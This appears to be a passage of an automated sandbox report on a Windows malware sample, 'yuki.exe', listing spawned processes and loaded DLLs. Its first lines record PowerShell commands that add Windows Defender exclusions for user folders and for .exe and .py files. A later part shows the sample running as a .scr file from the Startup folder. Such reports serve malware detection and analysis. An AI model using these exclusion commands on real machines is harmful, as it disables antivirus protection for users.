Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: C:\Users\user\Desktop\yuki.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: libcrypto-3.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: libssl-3.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: sqlite3.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: pywintypes312.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: msvcp140-d64049c6e3865410a7dda6a7e9f0c575.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: mfreadwrite.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: mfcore.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: ksuser.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: opencv_videoio_gstreamer4100_64.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: comppkgsup.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: windows.media.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: windows.applicationmodel.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\user\Desktop\yuki.exeSection loaded: opencv_videoio_ueye4100_64.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: sqlite3.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: pywintypes312.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: msvcp140-d64049c6e3865410a7dda6a7e9f0c575.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: mf.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: mfplat.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: mfreadwrite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: mfcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: ksuser.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: rtworkq.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: opencv_videoio_gstreamer4100_64.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: dxcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: comppkgsup.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: windows.media.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: windows.applicationmodel.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: appxdeploymentclient.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrSection loaded: opencv_videoio_ueye4100_64.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
